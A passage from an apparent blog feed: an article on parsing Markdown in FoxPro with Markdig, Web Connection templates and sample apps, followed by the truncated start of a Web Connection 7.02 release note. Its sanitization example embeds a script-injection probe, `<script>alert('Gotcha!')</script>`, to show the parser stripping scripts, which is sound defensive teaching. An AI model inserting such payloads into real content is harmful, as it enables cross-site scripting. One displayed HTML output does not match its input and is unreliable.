Markdown is a markup format, which means it is meant to take Markdown text and turn it into something else. Most commonly that something else is HTML, which can then be used for other things like PDF, Word or EPub document creation using additional and widely available tools.

Markdown has many uses and it can be applied to a number of different problem domains:

  • General document editing
  • Documentation
  • Rich text input and storage in applications
  • Specialized tools like note editing or todo lists etc.

If you're working in software and you're doing anything with open source, you've likely run into Markdown files and the ubiquitous readme.md files that are used for base documentation of products. Beyond that most big companies are now using Markdown as their primary documentation writing format.

What problem does Markdown Solve?

At this point you may be asking yourself: I've been writing for years in Word - what's wrong with that? Or: I use a WYSIWYG HTML editor in my Web application for rich text input, so what does Markdown provide that these solutions don't?

There are several main scenarios that Markdown (and also other markup languages) addresses that make it very useful.

Text Based

First, Markdown is text based, which means you don't need special tooling to edit a Markdown file. You don't need Word or some HTML based editor to edit Markdown. You can use Notepad or a plain HTML text box to write and edit Markdown text, and because Markdown features are very simple text 'markup directives', even a plain textbox lets you get most of the job done.

You can also use specialized editors - most code editors like Visual Studio Code, Notepad++ or Sublime text all have built in support for Markdown syntax coloring and some basic expansion. Or you can use a dedicated Markdown Editor like my own Markdown Monster.

Using Markdown in FoxPro

In order to use Markdown in any environment you need a Markdown parser that can convert Markdown into HTML. Once it's in HTML you need to use the HTML in a manner that is useful. For Web applications that's usually as easy as embedding the HTML into a document, but there are a number of different variations.

In desktop applications you often need a WebBrowser control or an external preview to see the Markdown rendered in a useful way.
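That preview step usually boils down to writing the rendered HTML to a temp file and shelling out to the default browser. Here's a minimal sketch that assumes the Markdown() helper discussed below:

DECLARE INTEGER ShellExecute IN shell32.dll ;
   INTEGER hwnd, STRING lpOperation, STRING lpFile, ;
   STRING lpParameters, STRING lpDirectory, INTEGER nShowCmd

lcHtml = Markdown(lcMarkdown)                && render Markdown to an HTML fragment
lcFile = ADDBS(SYS(2023)) + "_preview.html"  && write to the temp folder
STRTOFILE(lcHtml, lcFile)
ShellExecute(0, "open", lcFile, "", "", 1)   && show in the default browser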

Markdown Parsing for FoxPro

The best option for Markdown parsing in FoxPro is to use one of the many .NET based Markdown parsers that are available. I'm a big fan of the Markdig Markdown parser because it includes a ton of support features out of the box, like the Github flavored Markdown that is generally used, various table formats, link expansion, auto-id generation and fenced code blocks. Markdig is also extensible, so it's possible to create custom extensions that can be plugged into Markdig's Markdown processing pipeline.

To access this .NET component from FoxPro I'm going to use wwDotnetBridge. There are a couple of different ways to deal with Markdown parsing, but let's start with the simplest, which is just to use the built-in 'just do it' function that Markdig itself provides:

do wwDotNetBridge
LOCAL loBridge as wwDotNetBridge
loBridge = GetwwDotnetBridge()
loBridge.LoadAssembly("Markdig.dll")

TEXT TO lcMarkdown NOSHOW
# Markdown Sample 2
This is some sample Markdown text. This text is **bold** and *italic*.

* List Item 1
* List Item 2
* List Item 3

Great it works!

> ### Examples are great
> This is a block quote with a header

Here's a quick code block

```foxpro
lnCount = 10
FOR lnX = 1 TO lnCount
   ? "Item " + TRANSFORM(lnX)
ENDFOR
```
ENDTEXT

lcHtml = loBridge.InvokeStaticMethod("Markdig.Markdown","ToHtml",lcMarkdown,null)
? lcHtml
RETURN

Markdown Output

This is the raw code to access the Markdig dll and load it, then call the MarkDig.Markdown.ToHtml() function to convert the Markdown into HTML. It works and produces the following HTML output:

<h1>RAW MARKDOWN WITH Markdig</h1>
<p>This is some sample Markdown text. This text is <strong>bold</strong> and <em>italic</em>.</p>
<ul>
<li>List Item 1</li>
<li>List Item 2</li>
<li>List Item 3</li>
</ul>
<p>Great it works!</p>
<blockquote>
<h3>Examples are great</h3>
<p>This is a block quote with a header</p>
</blockquote>

which looks like this:

Keep in mind that Markdown rendering produces an HTML fragment, which doesn't look very nice because it's just HTML without any formatting applied. There's no formatting for the base HTML, and the code snippet is just raw text. To make this look a bit nicer we need to apply some formatting.

Here's that same HTML fragment rendered into a full HTML page with Bootstrap, highlightJs and a little bit of custom formatting applied:

This looks a lot nicer. The idea of this is to use a small template and merge the rendered HTML into it. Here's some code that uses a code based template (although I would probably store the template as a file and load it for customization purposes):

Here's the template:

<!DOCTYPE html>
<html>
<head>
    <title>String To Code Converter</title>
    <link href="https://unpkg.com/bootstrap@4.1.3/dist/css/bootstrap.min.css" rel="stylesheet" />
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css">
    <style>
        body, html {
            font-size: 16px;
        }
        body {
            margin: 10px 40px;
        }
        blockquote {
		    background: #f2f7fb;
		    font-size: 1.02em;
		    padding: 10px 20px;
		    margin: 1.2em;
		    border-left: 9px #569ad4 solid;
		    border-radius: 4px 0 0 4px;
		}
        @media(max-width: 600px) 
        {
            body, html {
                font-size: 15px !important;
            }
            body {
                margin: 10px 10px !important;                
            }
        }
    </style>
</head>
<body>
    <div style="margin: 20px 5%">
        <%= lcParsedHtml %>
    </div>

    <script src="https://weblog.west-wind.com/scripts/highlightjs/highlight.pack.js" type="text/javascript"></script>
    <link href="https://weblog.west-wind.com/scripts/highlightjs/styles/vs2015.css" rel="stylesheet" type="text/css" />
    <script>
		function highlightCode() {
		    var pres = document.querySelectorAll("pre>code");
		    for (var i = 0; i < pres.length; i++) {
    		    hljs.highlightBlock(pres[i]);
	    	}
		}
		highlightCode();
    </script>
</body>
</html>

and here is the code that parses the Markdown and merges it into the template. Notice the <%= lcParsedHtml %> tag that is responsible for merging the parsed HTML into the template:

DO MarkdownParser

TEXT TO lcMarkdown NOSHOW
# Markdown Sample 2
This is some sample Markdown text. This text is **bold** and *italic*.

* List Item 1
* List Item 2
* List Item 3

Great it works!

> ### Examples are great
> This is a block quote with a header

ENDTEXT

lcParsedHtml = Markdown(lcMarkdown,2)
? lcParsedHtml

lcTemplate = FILETOSTR("markdownpagetemplate.html")

*** Ugh: TEXTMERGE mangles the line breaks for the code snippet so manually merge
lchtml = STRTRAN(lcTemplate,"<%= lcParsedHtml %>",lcParsedHtml)
showHtml(lcHtml)

Beware of TEXTMERGE

FoxPro's TEXTMERGE command can have some odd side effects - when using << lcParsedHtml >> in the example above, TEXTMERGE mangled the line breaks, running text together instead of properly breaking lines based on the Markdown \n linefeed-only output. When merging output from a Markdown parser into an HTML document, explicitly replace the content rather than relying on TEXTMERGE.

Using the underlying Parser

The Markdown() function is very easy to use, and it uses a cached instance of the parser so the Markdown object doesn't have to be configured for each use. If you want a little more control you can use the underlying MarkdownParser class directly. This is a little more verbose, but allows for more customization.

TEXT TO lcMarkdown NOSHOW
This is some sample Markdown text. This text is **bold** and *italic*.

* List Item 1
* List Item 2
* List Item 3


<script>alert('Gotcha!')</script>
Great it works!

> #### Examples are great
> This is a block quote with a header
ENDTEXT

loParser = CREATEOBJECT("MarkdownParser")
loParser.lSanitizeHtml = .T.
lcParsedHtml = loParser.Parse(lcMarkdown)

? lcParsedHtml
ShowHtml(lcParsedHtml)

There's also a MarkdownParserExtended class that adds a few additional features, including support for FontAwesome icons via a custom syntax, and special escaping of <%= %> expressions, which are removed from the document before the Markdown parser runs so they don't interfere with the parser.

Sanitizing HTML

Because Markdown is a superset of HTML, you should treat all Markdown captured from users as dangerous.

Let me repeat that:

User Captured Markdown has to be Sanitized

Any user input you capture from users as Markdown that will be displayed on a Web site later should be treated just like raw HTML input - it should be considered dangerous and susceptible to Cross Site Scripting (XSS) Attacks.

You might have noticed the code above that does:

loParser.lSanitizeHtml = .T.

which enables HTML sanitation of the Markdown before it is returned. This flag forces <script> tags, javascript: directives and any onXXXX= events to be removed from the output HTML. This is the default setting, and it's what's always used when you call the Markdown() function.

Sanitation should usually be on, which is why it's the default, but there are a few scenarios where it makes sense to have this flag off. If you are in full control of the content you might have good reason to embed scripts. For example, I use Markdown for Blog posts and occasionally I link to my own code snippets on gist.github.com, which requires <script> tags to embed the scripts.

If the content you create is controlled, then this is not a problem. In this case I'm the only consumer. If you use Markdown for product descriptions in your product catalog and the data is all internally created, then it's probably safe to allow scripts. But even so - if you don't need scripts, don't allow them. Better safe than sorry - always!

Static Markdown in Web Connection

In addition to the simple Markdown Parsing, if you're using Web Connection there are a couple of useful features built into the framework that let you work with Markdown content.

  • Static Markdown Islands in Scripts and Templates
  • Static Markdown Pages

If you're building Web sites you probably have a bit of static content. Even if your site is mostly dynamic, almost every site has a number of static pages, or a bunch of content that is just text, like disclaimers or maybe some page level help content. Markdown is usually much easier to type than HTML markup for this lengthy text.

Markdown Islands

Web Connection Scripts and Templates support a special <markdown> tag. Basically you can embed a small block of Markdown into the middle of a larger Script or Template:

<markdown>
> ##### Please format your code
> If your post contains any code snippets, you can use the `<\>` button
> to select your code and apply a code language syntax. It makes it
> **much easier** for everyone to read your code.
</markdown>

This can be useful if you have an extended block of text inside of a greater page. For example you may have a download page that shows a rich HTML layout for download options, but the bottom half of the page has disclaimers, licensing and other stuff that's mostly just text (perhaps with very little HTML mixed in, which you can do inside of Markdown). Here's that example:

Static Markdown Pages

Sometimes you simply want to add a static page that is all or mostly text. Think about your About page, privacy policy, licensing pages etc. There are other more dynamic use cases as well. For example, you might want to create blog entries as Markdown Pages and simply store them on the server by dropping the page into a folder along with its related assets.

As of Web Connection 6.22 you can now drop a .md file into a folder and Web Connection will serve that file as an HTML document.

There's a new .md script map that Web Connection adds by default. For existing projects you can add the .md scriptmap to your existing scriptmaps for your site and then update the wwScripting class from your Web Connection installation.

There's also a new ~/Views/MarkdownTemplate.wcs, which is a script page into which the Markdown is rendered. Web Connection then generically maps any incoming .md extension files to this template and renders the Markdown into it.

The template can be extremely simple:

<%
    pcPageTitle = IIF(type("pcTitle") = "C", pcTitle, pcFilename)
%>
<% Layout="~/views/_layoutpage.wcs" %>
<div class="container">
    <%= pcMarkdown %>
</div>

This page simply references the master layout page and then creates a Bootstrap container into which the Markdown is rendered. There are two variables that are passed into the template: pcMarkdown and pcTitle. The title is extracted from the document either by looking for a YAML title header:

---
title: Markdown in FoxPro
postId: 432
---
# Markdown in FoxPro
Markdown is... and blah blah blah 

or from the first # header element towards the top of the document (the first 1500 characters).
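For illustration, title extraction along those lines might look like the following sketch. The function name and the delimiter handling are assumptions for demonstration, not Web Connection's actual implementation:

FUNCTION GetMarkdownTitle(lcMarkdown)
LOCAL lcTitle, lcYaml
lcTitle = ""

*** Check for a YAML front matter block with a title: key
IF LEFT(lcMarkdown, 3) == "---"
   lcYaml = STREXTRACT(lcMarkdown, "---", "---")
   lcTitle = STREXTRACT(lcYaml, "title:", CHR(10))
ENDIF

*** Fall back to the first # header near the top of the document
IF EMPTY(lcTitle)
   lcTitle = STREXTRACT(LEFT(lcMarkdown, 1500), "# ", CHR(10))
ENDIF

RETURN ALLTRIM(CHRTRAN(lcTitle, CHR(13), ""))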

Once the scriptmap and template are in place you can now simply place a .md document into the site's folder structure and it'll be served as HTML when referenced via the browser.

For the following example, I took an existing blog post I'd written in Markdown Monster as a Markdown file. I set up a folder structure for blog posts that encodes the date parts in the path, and simply dropped the existing Markdown file and its associated images into that folder:

And voila - I can now access this file at the specified URL:

https://localhost/wconnect/Markdown/posts/2018/09/25/FixwwDotnetBridgeBlocking.md

The folder structure provides the URL sections that fix the post uniquely in time, which is common for blog posts. This is an easy way to add a blog to a Web site without much effort at all. Simply write Markdown as a file and copy it to the server. For bonus points, integrate this with Git to allow posts to be edited and published using Git.

Using Markdown in Applications

Let's look at a few examples how I use Markdown in my own applications.

West Wind Support Message Board

In a Web Application it's easy to use Markdown and just take the output and stuff it into part of your rendered HTML page.

For example, on my message board I let users enter Markdown for messages that are then posted and displayed on the site:

The message board is available as a Web Connection sample site on GitHub:

The site displays each thread as a set of messages, with each message displaying its own individual Markdown content. This is a Web Connection application that uses script templates.

The Process class code just retrieves all the messages of the thread into a cursor from a business object and then uses a script page to render the output:

FUNCTION Thread(lcThreadId)
LOCAL loMsgBus

pcMsgId = Request.QueryString("msgId")

loMsgBus = CREATEOBJECT("wwt_Message")
lnResult = loMsgBus.GetThreadMessages(lcThreadId)

IF lnResult < 1
   Response.Redirect("~/threads.wwt")
   RETURN
ENDIF

PRIVATE poMarkdown
poMarkdown = THIS.GetMarkdownParser()

Response.GzipCompression = .T.

*** Don't auto-encode - we manually encode everything
*** so that emojii's and other extendeds work in the
*** markdown text
Response.Encoding = ""
Response.ContentType = "text/html; charset=utf-8"

Response.ExpandScript("~/thread.wwt")

This retrieves a list of messages that belong to the thread and the template loops through them and displays Markdown for each of the messages (simplified):

<%
    pcPageTitle = STRCONV(subject,9) + " - West Wind Message Board"
    pcThreadId = Threadid
%>
<% Layout="~/views/_layoutpage.wcs" %>
<div class="main-content">
    ... page header omitted

    <div class="thread-title page-header-text" style="margin-bottom: 0;"><%: TRIM(Subject) %></div>

    <!-- Message Loop -->
    <%
       lnI = 0
       SCAN
          lnI = lnI + 1
    %>
    <div id="ThreadMessageList">
        <article class="message-list-item" data-id="<%= msgId %>" data-sort="<%= lnI %>">
            ... header omitted

            <!-- Render the Message Markdown here -->
            <div class="message-list-body">
                <%= poMarkdown.Parse(Message,.T.) %>
            </div>
        </article>
    </div>
    <% ENDSCAN %>
</div>

Note that I'm not using the Markdown() function directly, as I'm doing some custom setup, and I also want to explicitly force the output to UTF-8 as part of the parsing process (the .T. parameter). The reason I'm using a custom function is that I need to explicitly strip out <% %> scripts before rendering so that they don't get executed as part of user input. I also want all links to automatically open in a new window called wwt by having a target added to each and every link tag.

In short, I need a customized parser - the generic Markdown() function doesn't quite provide what I need, so I implement my own version that is customized to my needs.

PROTECTED FUNCTION GetMarkdownParser()
LOCAL loMarkdown

PUBLIC __wwThreadsMarkdownParser
IF VARTYPE(__wwThreadsMarkdownParser) = "O"
   loMarkdown = __wwThreadsMarkdownParser
ELSE
	loMarkdown =  CreateObject("MarkdownParserExtended")
	loMarkdown.lFixCodeBlocks = .T.
	loMarkdown.cLinkTarget = "wwt"
	__wwThreadsMarkdownParser = loMarkdown
ENDIF

RETURN loMarkdown
ENDFUNC

This is very similar to what Markdown() does internally, but customized to my own needs. It still caches the parser instance in a global variable so it doesn't have to be recreated for each and every request, which improves performance.

Entering Markdown

The message board also captures Markdown text when users write a new message:

The data entry here is a simple <textarea></textarea>. As mentioned Markdown is just text, so a <textarea> works just fine.

<textarea id="Message" name="Message"
        style="min-height: 350px;padding: 5px; 
        font-family: Consolas, Menlo, monospace; border: none;
        background: #333; width: 100% ; color: #fafafa"><%= Request.FormOrValue('Message',poMsg.Message) %></textarea>

I simply changed the color scheme to light text on a dark background just to make it more 'terminal like' (I happen to like dark themes, if you haven't noticed). There is also logic to insert special Markdown into the textbox via selections using JavaScript and key shortcuts, but that's just a bonus.

The text is previewed as you type on the client side using a JavaScript component (marked.js) that simply re-renders the preview as the user types a message. Oddly enough, people still seem to screw up posting code constantly, even though the buttons are pretty prominent, as is the reminder message below. Go figure.

Using Markdown for Inventory Item information

A common use case for Markdown is to use it even in desktop applications that need to handle rich information. For example, in my Web Store I use Markdown for the item descriptions that are displayed in the store. I also have an offline application that I primarily use to manage my orders and inventory. The inventory form allows me to enter markdown text as plain text. There's a simple preview button that lets me simply see the content in the default browser.

If it's all good I can upload the item to my Web Server via a Web service and look at the item online where the Markdown is rendered using Markdig as shown before (but using .NET in this case).

The desktop application doesn't use Markdown in other places so here I just do the simplest thing possible in .NET code:

private void btnPreview_Click(object sender, EventArgs e)
{
    var builder = new MarkdownPipelineBuilder()
        .UseEmphasisExtras()
        .UsePipeTables()
        .UseGridTables()
        .UseAutoLinks() // URLs are parsed into anchors
        .UseAutoIdentifiers(AutoIdentifierOptions.GitHub) // Headers get id="name" 
        .UseAbbreviations()
        .UseYamlFrontMatter()
        .UseEmojiAndSmiley(true)
        .UseMediaLinks()
        .UseListExtras()
        .UseFigures()
        .UseCustomContainers()
        .UseGenericAttributes();

    var pipeline = builder.Build();
    
    var parsedHtml = Markdown.ToHtml(Item.Entity.Ldescript,pipeline);

    var html = PreviewTemplate.Replace("${ParsedHtml}", parsedHtml);
    ShellUtils.ShowHtml(html);
}

ShellUtils.ShowHtml(html); is part of Westwind.Utilities and simply takes an HTML fragment or a full HTML document, dumps it to a file, then shows that file in the default browser, which is the browser window shown in the previous figure.

Using Markdown for Documentation

As mentioned, Markdown is great for text entry, and documentation creation is the ultimate writing exercise. There are a couple of approaches that can be taken with this. I work on two separate tools related to documentation:

  • West Wind Html Help Builder
    An older FoxPro application that stores documentation content in FoxPro tables. The application was updated a while back to use Markdown for all memo style text entry.

  • KavaDocs
    This is a newer tool still under development that uses Markdown files on disk with embedded meta data to hold documentation and related data. The system is based on Git to provide shared editing functionality and collaboration. There are also many integrations with other technologies.

Help Builder and Traditional Help Systems

Help Builder uses FoxPro tables and is a self-contained solution where everything lives in a single tool. Help Builder was originally designed for building CHM files for use with FoxPro and other tools, and the UI reflects that. In recent years however the focus has been on building Web based output along with a richer Web UI than was previously used.

Help Builder internally uses script templates that handle the layout for each topic type. The following is the main topic template into which the content of the oTopic object and its properties that make up the help content is rendered:

<% Layout="~/templates/_Layout.wcs" %>

<h1 class="content-title">
    <img src="bmp/<%= TRIM(LOWER(oHelp.oTopic.Type)) %>.png">
    <%= iif(oHelp.oTopic.Static,[<img src="bmp/static.png" />],[]) %>
    <%= EncodeHtml(TRIM(oHelp.oTopic.Topic)) %>
</h1>

<div class="content-body" id="body">
    <%= oHelp.FormatHTML(oHelp.oTopic.Body) %>
</div>

<% IF !EMPTY(oHelp.oTopic.Remarks) %>
<h3 class="outdent" id="remarks">Remarks</h3>
<blockquote>
    <%= oHelp.FormatHTML(oHelp.oTopic.Remarks) %>
</blockquote>
<% ENDIF %>

<% IF !EMPTY(oHelp.oTopic.Example) %>
<h3 class="outdent" id="example">Example</h3>
<%= oHelp.FormatExample(oHelp.oTopic.Example) %>
<% ENDIF %>

<% if !EMPTY(oHelp.oTopic.SeeAlso) %>
<h3 class="outdent" id="seealso">See also</h3>
<%= lcSeeAlsoTopics %>
<% endif %>

These templates are customizable by the user.

The key item to note here is the oHelp.FormatHtml() function, which is responsible for turning the content of a specific multi-line field into HTML. There are several formats supported, with Markdown being the newest addition.

***********************************************************************
* wwHelp :: FormatHtml
*********************************
LPARAMETER lcHTML, llUnformat, llDontParseTopicLinks, lnViewMode
LOCAL x, lnRawHTML, lcBlock, llRichEditor, lcText, lcLink

IF EMPTY(lnViewMode)
  IF VARTYPE(this.oTopic) == "O"
     lnViewMode = this.oTopic.ViewMode
  ELSE
     lnViewMode = 0
  ENDIF     
ENDIF

*** MarkDown Mode
IF lnViewMode = 2 
   IF TYPE("poMarkdownParser") # "O"
      poMarkdownParser = CREATEOBJECT("wwHelpMarkDownParser")
      poMarkdownParser.CreateParser(.t.,.t.)
   ENDIF
   RETURN poMarkdownParser.Parse(lcHtml, llDontParseTopicLinks)
ENDIF  

IF lnViewMode = 1
   RETURN lcHtml
ENDIF

IF lnViewMode = 0 OR lnViewMode = 1
	loParser = CREATEOBJECT("HelpBuilderBodyParser")	
	RETURN loParser.Parse(lcHtml, llDontParseTopicLinks)
ENDIF

RETURN "Invalid ViewMode"
* EOF FixNoFormat

As I showed earlier in the Message Board sample, here again I use the Markdig parser, but in this case there's some additional logic built on top of the base Markdown parser that deals with Help Builder specific directives and formatting options. wwHelpMarkdownParser extends MarkdownParserExtended to do this.

As before, the parser is cached so an existing instance doesn't have to be recreated. Each topic can have up to 5 Markdown sections, so reuse is an important performance point. The template renders HTML output into a local file, which is then displayed in the preview on the left in a Web Browser control.

Output generation varies depending on whether you're previewing which generates a local file that is previewed from disk. Online there's a full HTML UI that surrounds each topic and provides for topic navigation:

The online version is completely static, so the Markdown to HTML generation actually happens during build time of the project. Once generated you end up with a static HTML Web site that can just be uploaded to a Web server.

KavaDocs

KavaDocs is another documentation project I'm working on with Markus Egger. It also uses Markdown but the concept is very different and relies on Markdown files on disk and online in a Git repository. There are two components to this tool. One is a local Markdown Monster Addin that basically provides project features to tie together the Markdown files that otherwise just exist on disk. The KavaDocs Addin provides a table of contents and hierarchy and some base information about topics. Most of the topic related information is actually stored inside of the topic files as YAML data.

Files are stored and edited as plain Markdown files with topic content stored inside each of the topics. The Table of Contents contains the topics list to tie the individual topics together along with a few bits of other information like keywords, categories, related links and so on.

The other part to KavaDocs is an online application. It's a SAAS application that can serve this Markdown based documentation content dynamically via a generic Web service interface. You create a Web site like markdownmonster.kavadocs.com which then serves the documentation directly from a Github repository using a number of different nicely formatted and real-time switchable themes.

The concept here is very different in that the content is entirely managed on disk via plain Markdown files. The table of content pulls the project information together, and Git serves as the distribution mechanism. The Web site provides the front end while Git provides the data store.

The big benefit of this solution is that it's easy to collaborate. Since all documentation is done as Markdown text it's easy to sync changes via Git, and any changes merged into the master branch are immediately visible. It's a really quick way to get documentation online.

White Papers and Articles like this one

These days I much prefer to write everything I can in Markdown. However, for articles for print or even some online magazines, the standard for documents continues to be Microsoft Word mainly because the review process in Word is well defined.

However, I like to write my original document in Markdown because I simply have a more efficient workflow writing this way, with really easy ways to capture images and paste them into documents for example. Markdown Monster's image pasting feature also copies files to disk and optimizes them, and it's just a huge time saver, as is the built-in image capture integration using either SnagIt or the built-in capture. Linking to Web content too is much quicker with Markdown, as is dealing with the frequently changing code snippets in technical articles. Believe me when I say that using Markdown can shave hours off document creation for me compared to using Word.

So for publications I often write in Markdown and then export the document to Word, either by rendering to HTML and importing the HTML, or by using PanDoc - the Swiss Army knife of document conversions - to convert my Markdown directly to Word or PDF. PDF conversions can be very good, as you can see from the Markdown Monster generated PDF output of the original document for this article. Conversions to MS Word are usually good, but they do need adjustments for the often funky paragraph formatting required by publishers. Even with that extra step, writing in Markdown plus document fixup is usually easier than writing in Word.

The other advantage of this approach is that once the document is in Markdown I can reuse the document much more easily. If you've ever written a Word document and then tried to publish that Word document on the Web, you know what a hot mess Microsoft Word HTML is. It works but the documents are huge and basically become uneditable as HTML.

With a document written in Markdown I can convert my doc to Word and do a quick edit/cleanup run before pushing it to my publisher, but I can then turn around and use the same Markdown to publish it on my blog, submit the PDF to a conference and also make it available on GitHub for editing. I can also use the page handler I described earlier to simply drop the Markdown file plus the images into a folder on my Web site.

IOW, Markdown makes it much easier to reuse the content you create because it is just text and inherently more portable.

Generic Markdown Usage

Once you get the Markdown bug you'll find a lot of places where you can use Markdown. I love using Markdown for notes, ToDo lists, keeping track of client info, call logs, quick time tracking and other stuff.

Here are a few examples.

Using Gists to publish Markdown Pages

Github has a related site that allows you to publish individual code snippets for sharing. Github Gist is basically a mini Git repository that holds one or more files that you can quickly post and share. It's great for sharing a code snippet that you can then link to from a Tweet or a post on another social network, for example.

Gists are typically named as files and the file extension determines what kind of syntax coloring is applied to the snippet or snippet(s). One of the supported formats is Markdown which makes it possible to easily create Gists and write and publish an entire article.

Gists are essentially mini documents that can be posted as code snippets on the Web. It's an easy way to share code snippets, or even treat Gists like a simple micro blogging platform:

Gists can be shared via URL, and can also be retrieved via a simple REST API.

For example, Markdown Monster allows you to open a document from Gist using Open From Gist. You can edit the document in the local editor, then post it back to the Gist which effectively updates it. All this happens through two very simple JSON REST API calls.
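From FoxPro you can talk to the same Gist API with wwHttp and wwJsonSerializer. Here's a hedged sketch against GitHub's documented /gists/{id} endpoint - lcGistId is a placeholder and error handling is omitted:

DO wwHttp
DO wwJsonSerializer

loHttp = CREATEOBJECT("wwHttp")
loHttp.AddHeader("User-Agent", "FoxPro-Gist-Sample")  && GitHub requires a User-Agent
lcJson = loHttp.HttpGet("https://api.github.com/gists/" + lcGistId)

loSer = CREATEOBJECT("wwJsonSerializer")
loGist = loSer.DeserializeJson(lcJson)
? loGist.description   && Gist metadata from the deserialized JSON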

One fly in the ointment to this approach is that images have to be linked as absolute Web URLs, because there's no facility to upload images as part of a Gist. You can upload images to a Github image repo, Azure Blob storage or some similar mechanism to get absolute URLs for your images.

I love posting Gists for code samples. Although Gists support posting specific language files (like FoxPro or C# files), I'd much rather post a Markdown document that includes the code and then describes more info around the code snippet.

Markdown for Everything? No!

Ok, so I've been touting Markdown as pretty awesome and I really think it addresses many of the issues I've had over the years of writing for publications, writing documentation or simply keeping track of things. Using Markdown has made me more productive for many text editing tasks.

But at the same time there are limits to what you can effectively do with Markdown, at least to date. For magazine articles I still tend to need Word. Although I usually write my articles using Markdown, I usually have to convert them to a Word document (which BTW is easy via HTML conversion or even using a tool like PanDoc to convert Markdown to Word). The reason is that my editors work with Word, and when all is said and done Word's document review and comparison features are second to none. While you can certainly do change tracking and multi-user syncing by using Markdown with Git, it's not anywhere near as smooth as what's built into Word.

There are other things that Markdown is not good for. When talking about HTML, Markdown addresses bulk text editing needs nicely. If you're editing an About page or Privacy Policy, Sales page etc. Markdown is much easier than HTML to get into the page. Even larger blocks of Html Text inside of larger HTML documents are a good fit for Markdown using what I call Markdown Islands. But Markdown is not a replacement for full HTML layout. You're not going to replace entire Web sites using just Markdown - you still need raw HTML for layout and overall site behavior.

In short, make sure you understand what you're using Markdown for and whether that makes sense. I think it's fairly easy to spot the edges where Markdown usage is not the best choice and also where it is. If you're dealing with mostly text data Markdown is probably a good fit. Know what works...

Markdown for Notes and Todo Lists

In addition to application related features, I've also found Markdown to be an excellent format for note taking and todo lists. It's easy to create lists with Markdown text, so it's easy to open up a Markdown document and just fire away.

Here are some things I keep in Markdown:

General Notes

  • General Todo List
  • Phone Call Notes Document

Client Specific Notes

  • Client specific Notes
  • Client specific Work Item List
  • Client Logins/Account information (using MM Encrypted Files)

Shared Content - DropBox/OneDrive

  • Clipboard.md - machine sharable clipboard

Shared Access: DropBox or Git

First off I store most of my notes and todo items in shared folders of some sort. For my personal notes and Todo lists they are stored on DropBox in a custom Notes folder which has task specific sub-folders.

For customers I tend to store my public notes in Git repositories along with the source code (in a Documentation or Administration folder usually). Private notes I keep in my DropBox Notes folder.

Markdown Monster Favorites

Another super helpful feature in Markdown Monster that I use a lot is the Favorites feature. Favorites lets me pin individual Markdown documents like my Call Log and ToDo list or an entire folder on the searchable Favorites tab. This makes it very quick to find relevant content without keeping a ton of Markdown documents open all the time.

Summary

Markdown is simple tech which at the surface seems like a throwback to earlier days of technology. But - to me at least - the simpler technology actually means better productivity and much better control over the document format. The simplicity of text means I get a fast editor, easy content focused editing and as an extra bonus as a developer I get the opportunity to hack on Markdown with code. It's just text so it's easy to handle custom syntax or otherwise manipulate the Markdown document.

In fact, I went overboard on this and created my own Markdown editor, because frankly the tooling that has been out there for Windows really sucked. Markdown Monster is my vision of how I want a Markdown editor to work. I write a lot, and so a lot of first hand writing experience and convenience is baked into this editor and the Markdown processing that happens. If I were dealing with a proprietary format like Word, or even with just HTML, none of that would be possible. But because Markdown is just text there are lots of opportunities to manipulate both the Markdown itself in terms of the (optional) UI editing experience as well as the output generation. It's truly awesome what is possible.

this post was created and published with Markdown Monster

Resources

Web Connection 7.02 has been released

$
0
0

I'm happy to announce that I've released v7.02 of West Wind Web Connection today. This is primarily a maintenance release that fixes a few small issues that have cropped since the initial 7.0 release, but there are also quite a few new enhancements and small new features.

You can find the Shareware version of Web Connection here:

If you are a registered user, you should have gotten an email late last week with a download link. I've made a few more small fixes to the release since then, so if you downloaded last week or over the weekend you might want to re-download the latest bits using the same info from the update email.

Updating to Version 7.02

This release is not a major update and there is only one small breaking change due to a file consolidation. This is first and foremost a maintenance update for the huge 7.0 release, but if you're running 7.0 you should definitely update for the bug fixes.

Updates are easy and can simply install on top of an existing version, or you can install multiple versions side by side and simply adjust your specific project's path to the appropriate version folders.

Bug Fixes

First and foremost this release is a maintenance release that fixes a few small but annoying bugs in a number of different aspects of Web Connection. Version 7.0 was a huge drop of new functionality and processes in Web Connection and there were a few small issues that needed fixing as is usually the case when there is a major release.

A huge shoutout to Mike McDonald who found and reported quite a few small bugs and posted them on the message board. Mike went above and beyond apparently poking around the Web Connection code base to dig up a few obscure (and a few more serious ones) which have now been fixed. Thanks Mike!

Setup Improvements

The primary focus of Version 7.x has been to make the development and deployment process of Web Connection easier and the 7.02 continues this focus with a number of Setup and Getting Started related enhancements.

Web Connection now generates a launch.prg file for new projects and ships with a launch.prg for the sample project. This file is a one stop start mechanism for your application, launching both the Web Connection server during development and the Web Browser. This PRG file also contains the default environment setup (Paths back to the Web Connection installation basically) to make it drop dead easy to run your applications. The file can start either a full local IIS Web Server or launch IIS Express.

To launch with IIS or Apache:

do launch

to launch IIS Express:

do launch with .t.

The main reason for this file is to make it easy for first time users to check out their application. It's also a great way to start your application for the first time after a cold FoxPro start, and to ensure that the FoxPro environment is set up properly. The file can be customized too - for example you can add additional path and environment settings that you need for your setup, and you can change the startup path to a page that you are actively developing for quickly jumping into areas you are working on.

There are also improvements in the BrowserSync functionality to automatically refresh Web pages when you make changes to the Web content files. This was introduced in v7.0 and the default template has been improved for more reliable operation.

The Setup now also prompts for IIS or IIS Express configuration when installing, to remind people explicitly that a Web Server has to be installed before Web Connection is installed.

I've also spent quite a bit of time updating the Getting Started documentation to reflect some of these changes so the Setup docs, and the Getting Started tutorial all are updated for easier usage.

Updated Sample Applications

The West Wind Message Board and WebLog applications are fully functional sample applications that are in use on the West Wind site. Both have been updated to MVC style scripting applications from their original WebControl based implementations. The Message Board was updated for v7.0, and there have been a number of additional enhancements including a few nice editor updates, much better image compression on uploaded images, and search enhancements. The WebLog has been completely reworked and simplified to MVC style scripts.

The Message Board is available as an installable sample application on Github while the WebLog sample ships in the box with Web Connection as before.

New wwDynamic Class

There's also a useful new feature in the form of a wwDynamic class which lets you build up a FoxPro object dynamically, simply by adding properties to it. This is similar to using the FoxPro EMPTY class with ADDPROPERTY(), except you don't actually have to use that cumbersome syntax. The class also supports an .AddProp() method that can preserve the special character casing required for JSON serialization: .AddProp() automatically maintains a __PropertyNameOverrides property that is utilized during JSON serialization to handle proper casing instead of the lower case default used otherwise.

Here's an example of using the wwDynamic class to create a type 'on the fly':

*** Extend an existing object
loCust = CREATEOBJECT("cCustomer")
